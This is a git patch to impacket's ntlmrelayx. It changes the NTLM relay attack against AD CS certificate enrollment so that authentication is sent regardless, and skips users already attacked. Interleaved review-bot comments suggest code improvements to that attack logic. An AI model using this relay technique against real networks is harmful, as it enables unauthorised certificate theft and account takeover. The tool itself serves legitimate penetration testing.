From 2b7493809fc4ab235080e6d72b21259080e6ed4b Mon Sep 17 00:00:00 2001
From: tw1sm
Date: Wed, 4 Aug 2021 00:20:08 -0400
Subject: [PATCH 1/2] Send auth even if not requested by cert server

---
 impacket/examples/ntlmrelayx/clients/httprelayclient.py | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/impacket/examples/ntlmrelayx/clients/httprelayclient.py b/impacket/examples/ntlmrelayx/clients/httprelayclient.py
index 608dc8db4c..ece4d890fa 100644
--- a/impacket/examples/ntlmrelayx/clients/httprelayclient.py
+++ b/impacket/examples/ntlmrelayx/clients/httprelayclient.py
@@ -63,7 +63,10 @@ def sendNegotiate(self,negotiateMessage):
 return False
 except (KeyError, TypeError):
 LOG.error('No authentication requested by the server for url %s' % self.targetHost)
-return False
+if self.serverConfig.isADCSAttack:
+LOG.info('IIS cert server may allow anonymous authentication, sending NTLM auth anyways')
+else:
+return False
 
 #Negotiate auth
 negotiate = base64.b64encode(negotiateMessage).decode("ascii")

From ed9fd5aade3b3d1e60c009cd9765cf15d019ea66 Mon Sep 17 00:00:00 2001
From: Tw1sm
Date: Wed, 4 Aug 2021 10:08:55 -0400
Subject: [PATCH 2/2] prevent replay of already attacked clients

---
 impacket/examples/ntlmrelayx/attacks/httpattack.py | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/impacket/examples/ntlmrelayx/attacks/httpattack.py b/impacket/examples/ntlmrelayx/attacks/httpattack.py
index 454b0a6467..f095fe5ae8 100644
--- a/impacket/examples/ntlmrelayx/attacks/httpattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/httpattack.py
@@ -21,6 +21,9 @@ from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
 PROTOCOL_ATTACK_CLASS = "HTTPAttack"
+# cache already attacked clients
+ELEVATED = []
+
 class HTTPAttack(ProtocolAttack):
 """
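Review bot: `LOG.error('No authentication requested by the server for url %s' % self.targetHost)` still fires unconditionally before the new `if self.serverConfig.isADCSAttack:` branch, so the ADCS path logs an error for a condition it then deliberately tolerates and immediately follows it with an info line saying it is proceeding; moving the error into the `else:` branch keeps the log levels honest: `else:` / `LOG.error('No authentication requested by the server for url %s' % self.targetHost)` / `return False`. Whether every `serverConfig` object carries an `isADCSAttack` attribute cannot be seen from this hunk; if it can be absent for non-ADCS runs, `getattr(self.serverConfig, 'isADCSAttack', False)` avoids raising AttributeError from inside the except handler. sendNegotiate starts before this hunk and its body continues past it.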
@@ -62,6 +65,9 @@ def adcs_relay_attack(self):
 key = crypto.PKey()
 key.generate_key(crypto.TYPE_RSA, 4096)
+if self.username in ELEVATED:
+print('[*] Skipping user %s since attack was already performed' % self.username)
+return
 csr = self.generate_csr(key, self.username)
 csr = csr.decode().replace("\n", "").replace("+", "%2b").replace(" ", "+")
 print("[*] CSR generated!")
@@ -77,6 +83,7 @@ def adcs_relay_attack(self):
 
 print("[*] Getting certificate...")
 self.client.request("POST", "/certsrv/certfnsh.asp", body=data, headers=headers)
+ELEVATED.append(self.username)
 response = self.client.getresponse()
 
 if response.status != 200:
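Review bot: The guard `if self.username in ELEVATED:` is placed after `key = crypto.PKey()` and `key.generate_key(crypto.TYPE_RSA, 4096)`, so the 4096-bit key generation it is meant to short-circuit still runs on the skip path; as a guard clause it belongs at the top of the method, before the key is created. `ELEVATED` (introduced in the earlier hunk of this file) is a module-level list used only for membership tests and appends, so `ELEVATED = set()` with `ELEVATED.add(self.username)` in the following hunk is the better fit than `list`/`append`. Its comment should also make the scope explicit, e.g. `# process-wide: shared by every HTTPAttack instance for the lifetime of the run`, since the current `# cache already attacked clients` does not say where the state lives. adcs_relay_attack begins before this hunk and continues past it.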
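Review bot: `ELEVATED.append(self.username)` runs right after `self.client.request(...)` is issued and before `response.status` is examined on the following lines, so the list records usernames for which a request was attempted, not ones for which it succeeded, which is narrower than the comment `# cache already attacked clients` and the patch title imply. If attempt-based caching is the intent, the comment on `ELEVATED` should say so, e.g. `# usernames for which a certificate request was already attempted, regardless of outcome`; otherwise the name and comment overstate what the list holds. The rest of the status handling is outside this hunk, so whether a non-200 response is later treated as terminal cannot be confirmed here.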